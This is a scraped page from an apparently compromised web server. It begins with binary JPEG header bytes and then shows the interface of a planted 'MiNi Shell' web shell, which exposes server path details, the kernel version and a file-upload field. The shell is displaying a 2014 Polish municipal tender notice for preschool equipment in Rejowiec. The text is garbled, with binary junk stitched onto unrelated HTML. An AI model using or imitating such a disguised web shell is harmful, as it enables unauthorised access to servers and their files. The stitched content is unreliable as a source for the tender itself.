JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140731/166415-N-2014.html

<p class="kh_header"><b>Rejowiec: MODERNIZACJA ODDZIAŁÓW PRZEDSZKOLNYCH W SZKOŁACH PODSTAWOWYCH</b><br>
<b>Numer ogłoszenia: 166415 - 2014; data zamieszczenia: 31.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rejowiec , ul. Henryka Dąbrowskiego 1, 22-360 Rejowiec, woj. lubelskie, tel. 82 5688159, faks 82 5688753.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.rejowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MODERNIZACJA ODDZIAŁÓW PRZEDSZKOLNYCH W SZKOŁACH PODSTAWOWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W skład zamówienia wchodzi cztery części:
1) Część II - Dostosowanie pomieszczeń w oddziałach przedszkolnych:
II.1 - Dostosowanie toalet do potrzeb dzieci: umywalka, miski ustępowe ze spłuczka o
wysokości 33 cm , podajnik na papier toaletowy, glazura, terakota,
II.2- Modernizacja toalet dla personelu poprzez zakup i montaż urządzeń: umywalka,
miska ustępowa, podajnik na papier toaletowy, suszarka ścienna do rąk, lustro,
podajnik na mydło, glazura, terakota, drzwi wewnętrzne.
3) Część III - Wyposażenie do utrzymania czystości w pomieszczeniach i doposażenie
kuchni:
III.1 - Wyposażenie do utrzymania czystości w pomieszczeniach: odkurzacz z
funkcją piorącą, pralka automatyczna, wózek dwuwiaderkowy.
III.2 - Wyposażenie lub doposażenie kuchni: podgrzewacz do potraw wraz z grzałka
elektryczną, naleśnik arka elektryczna, zmywarka gastronomiczna, obieraczka do
ziemniaków, łyżki cedzakowe, blat roboczy podstawa pod garnki, ubijak do
ziemniaków, wózek dwuwiaderkowy, taboret gazowy podwójny, pojemnik
gastronomiczny z ruchomymi uchwytami wraz z pokrywami z wycięciem na uchwyty
i łyżkę, patelnia aluminiowa z powłoką teflonową.
4) Część IV - Wyposażenie oddziałów przedszkolnych - meble wraz z montażem,
wyposażenie wypoczynkowe, szatni oraz innych pomieszczeń gospodarczych,
pomoce dydaktyczne i artykuły plastyczne:
IV.1 - Meble i wyposażenie wraz z montażem: stoliki szkolne dwuosobowe z
regulacją, krzesełka szkolne, regał otwarty, regał skrzyniowy z półką odkrytą, regał
skrzyniowy czterodrzwiowy, regał niski z szufladami, wykładzina dywanowa, szafka
zamykana dwudrzwiowa, szafka ze schowkami, szafka zamykana z półką otwartą,
biurko dla nauczyciela, krzesło wysokie, tablica sucho ścieralna magnetyczna
lakierowana, rolety okienne.
IV.2 - Zakup wyposażenia wypoczynkowego: pufy piankowe, materace piankowe
składane.
IV.3 - Zakup i montaż mebli do wyposażenia szatni i innych pomieszczeń
gospodarczych: szafki na ubrania, metalowa szafa gospodarcza, ławeczki do szatni.
IV.4 - Zabawki i pomoce dydaktyczne - komplet zabawek: klocki z tworzywa
różne komplety (budowlane typu DUPLO, inne podobne), kolorowe klocki
drewniane, geometryczne kształty z tworzywa, samochód wywrotka, strażacki,
betoniarka, koparka, zestaw narzędzi do majsterkowania, piłki, piłki do skakania
45 cm , skakanki, lalki, łóżko drewniane, zestaw małego lekarza, kasa z kalkulatorem,
straganik narożny, domek letniskowy dla lalek.
IV.5 - Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w grupie
przedszkolnej: słuchowiska z bajkami-zestaw edukacyjny, gry planszowe, gry
skojarzeniowe i memory, uczymy się słówek-książka z ćwiczeniami, sylabowo,
ścienna mapa, polski dla dzieci, gry ćwiczące pamięć dziecka, liczydło na stojaku,
magnetyczne liczby, plansze przyrodnicze tematyczne-edukacyjne, magnes do tablic,
zestaw historyjek obrazkowych, puzzle ekologiczne, domino alfabet, kalendarztablica
magnetyczna, zegar czynności i pór roku.
IV.6 - Artykuły plastyczne-komplet artykułów plastycznych: brystol biały A4,
papier kolorowy rysunkowy A4, bibuła mix kolorów, nożyczki przedszkolne,
taśma samoprzylepna, papier szary A3, markery zmywalne, plastelina, zestaw pędzli
do malowania, klej czarodziejski 0,5 l , farby tempera, tektura falista, ołówki, papier
ksero.
IV.7 - Komplet wyposażenia zapewniającego bezpieczne warunki opieki nad
dziećmi; gaśnica, oznaczenie ewakuacyjne, apteczka z kompletnym wyposażeniem,
zabezpieczenie gniazdek, skrzynka na klucze ewakuacyjne, instrukcja udzielania
pierwszej pomocy, zabezpieczenie grzejników zabudową w celu uniknięcia
oparzenia oraz urazów głowy, osłony grzejnikowe.
5) Część V - Wyposażenie oddziałów przedszkolnych - sprzęt ICT, audiowizualny,
tablice interaktywne z oprogramowaniem, kserokopiarki:
V.1 - Zakup sprzętu ICT: laptop z oprogramowaniem systemowym/komputer
przenośny/, oprogramowanie biurowe/edytor tekstu, arkusz klkulacyjny/, rzutnik
multimedialny- projektor krótkoogniskowy LCD/niezbędny do funkcji tablicy
interaktywnej.
V.2 - Zakup sprzętu audiowizualnego: telewizor LED, radio z odtwarzaczem CD
i MP3, odtwarzacz DVD.
V.3 - Zakup tablic interaktywnych wraz z oprogramowaniem: tablica interaktywna
wraz z oprogramowaniem, specjalistyczne oprogramowanie edukacyjne do tablicy
interaktywnej.
V.4 - Zakup kserokopiarki: kserokopiarka,
V.5 - Wykorzystywanie technologii ICT w zarządzaniu placówką: oprogramowanie
służące do zarządzania placówka..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.23.60.00-2, 48.19.00.00-6, 30.21.31.00-6, 32.32.20.00-6, 32.00.00.00-3, 32.30.00.00-6, 45.11.12.91-4, 45.11.27.23-9, 45.22.38.00-4, 37.53.52.00-9, 37.50.00.00-3, 37.52.00.00-9, 39.16.10.00-8, 39.22.00.00-0, 39.72.00.00-5, 45.10.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie z art 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz robót budowlanych, wykaz dostaw i usług</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie z art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zgodnie z § 9 projektu umowy - załącznik nr 9 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ugrejowiec.bip.e-zeto.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rejowiec, Dąbrowskiego 1, 22-360 Rejowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2014 godzina 10:00, miejsce: Urząd Gminy Rejowiec, Dąbrowskiego 1, 22-360 Rejowiec (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt finansowany ze środków Europejskiego Funduszu Społecznego w ramach
Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach, 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, 9.1.1. Zmniejszanie nierówności w stopniu upowszechniania edukacji przedszkolnej Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostosowanie pomieszczeń w oddziałach przedszkolnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II.1 - Dostosowanie toalet do potrzeb dzieci: umywalka, miski ustępowe ze spłuczka o
wysokości 33 cm , podajnik na papier toaletowy, glazura, terakota,
II.2- Modernizacja toalet dla personelu poprzez zakup i montaż urządzeń: umywalka,
miska ustępowa, podajnik na papier toaletowy, suszarka ścienna do rąk, lustro,
podajnik na mydło, glazura, terakota, drzwi wewnętrzne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wyposażenie i utrzymanie czystości w pomieszczeniach i doposażenie kuchni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> III.1 - Wyposażenie do utrzymania czystości w pomieszczeniach: odkurzacz z
funkcją piorącą, pralka automatyczna, wózek dwuwiaderkowy.
III.2 - Wyposażenie lub doposażenie kuchni: podgrzewacz do potraw wraz z grzałka
elektryczną, naleśnik arka elektryczna, zmywarka gastronomiczna, obieraczka do
ziemniaków, łyżki cedzakowe, blat roboczy podstawa pod garnki, ubijak do
ziemniaków, wózek dwuwiaderkowy, taboret gazowy podwójny, pojemnik
gastronomiczny z ruchomymi uchwytami wraz z pokrywami z wycięciem na uchwyty
i łyżkę, patelnia aluminiowa z powłoką teflonową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wyposażenie oddziałów przedszkolnych - meble wraz z montażem, wyposażenie wypoczynkowe, szatni oraz innych pomieszczeń gospodarczych,pomoce dydaktyczne i artykuły plastyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> IV.1 - Meble i wyposażenie wraz z montażem: stoliki szkolne dwuosobowe z
regulacją, krzesełka szkolne, regał otwarty, regał skrzyniowy z półką odkrytą, regał
skrzyniowy czterodrzwiowy, regał niski z szufladami, wykładzina dywanowa, szafka
zamykana dwudrzwiowa, szafka ze schowkami, szafka zamykana z półką otwartą,
biurko dla nauczyciela, krzesło wysokie, tablica sucho ścieralna magnetyczna
lakierowana, rolety okienne.
IV.2 - Zakup wyposażenia wypoczynkowego: pufy piankowe, materace piankowe
składane.
IV.3 - Zakup i montaż mebli do wyposażenia szatni i innych pomieszczeń
gospodarczych: szafki na ubrania, metalowa szafa gospodarcza, ławeczki do szatni.
IV.4 - Zabawki i pomoce dydaktyczne - komplet zabawek: klocki z tworzywa
różne komplety (budowlane typu DUPLO, inne podobne), kolorowe klocki
drewniane, geometryczne kształty z tworzywa, samochód wywrotka, strażacki,
betoniarka, koparka, zestaw narzędzi do majsterkowania, piłki, piłki do skakania
45 cm , skakanki, lalki, łóżko drewniane, zestaw małego lekarza, kasa z kalkulatorem,
straganik narożny, domek letniskowy dla lalek.
IV.5 - Komplet pomocy dydaktycznych potrzebnych do realizacji zajęć w grupie
przedszkolnej: słuchowiska z bajkami-zestaw edukacyjny, gry planszowe, gry
skojarzeniowe i memory, uczymy się słówek-książka z ćwiczeniami, sylabowo,
ścienna mapa, polski dla dzieci, gry ćwiczące pamięć dziecka, liczydło na stojaku,
magnetyczne liczby, plansze przyrodnicze tematyczne-edukacyjne, magnes do tablic,
zestaw historyjek obrazkowych, puzzle ekologiczne, domino alfabet, kalendarztablica
magnetyczna, zegar czynności i pór roku.
IV.6 - Artykuły plastyczne-komplet artykułów plastycznych: brystol biały A4,
papier kolorowy rysunkowy A4, bibuła mix kolorów, nożyczki przedszkolne,
taśma samoprzylepna, papier szary A3, markery zmywalne, plastelina, zestaw pędzli
do malowania, klej czarodziejski 0,5 l , farby tempera, tektura falista, ołówki, papier
ksero.
IV.7 - Komplet wyposażenia zapewniającego bezpieczne warunki opieki nad
dziećmi; gaśnica, oznaczenie ewakuacyjne, apteczka z kompletnym wyposażeniem,
zabezpieczenie gniazdek, skrzynka na klucze ewakuacyjne, instrukcja udzielania
pierwszej pomocy, zabezpieczenie grzejników zabudową w celu uniknięcia
oparzenia oraz urazów głowy, osłony grzejnikowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.10.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wyposażenie oddziałów przedszkolnych - sprzęt ICT, audiowizualny, tablice interaktywne z oprogramowaniem, kserokopiarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> V.1 - Zakup sprzętu ICT: laptop z oprogramowaniem systemowym/komputer
przenośny/, oprogramowanie biurowe/edytor tekstu, arkusz kalkulacyjny/, rzutnik
multimedialny- projektor krótkoogniskowy LCD/niezbędny do funkcji tablicy
interaktywnej.
V.2 - Zakup sprzętu audiowizualnego: telewizor LED, radio z odtwarzaczem CD
i MP3, odtwarzacz DVD.
V.3 - Zakup tablic interaktywnych wraz z oprogramowaniem: tablica interaktywna
wraz z oprogramowaniem, specjalistyczne oprogramowanie edukacyjne do tablicy
interaktywnej.
V.4 - Zakup kserokopiarki: kserokopiarka,
V.5 - Wykorzystywanie technologii ICT w zarządzaniu placówką: oprogramowanie
służące do zarządzania placówką..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2, 30.21.31.00-6, 32.00.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com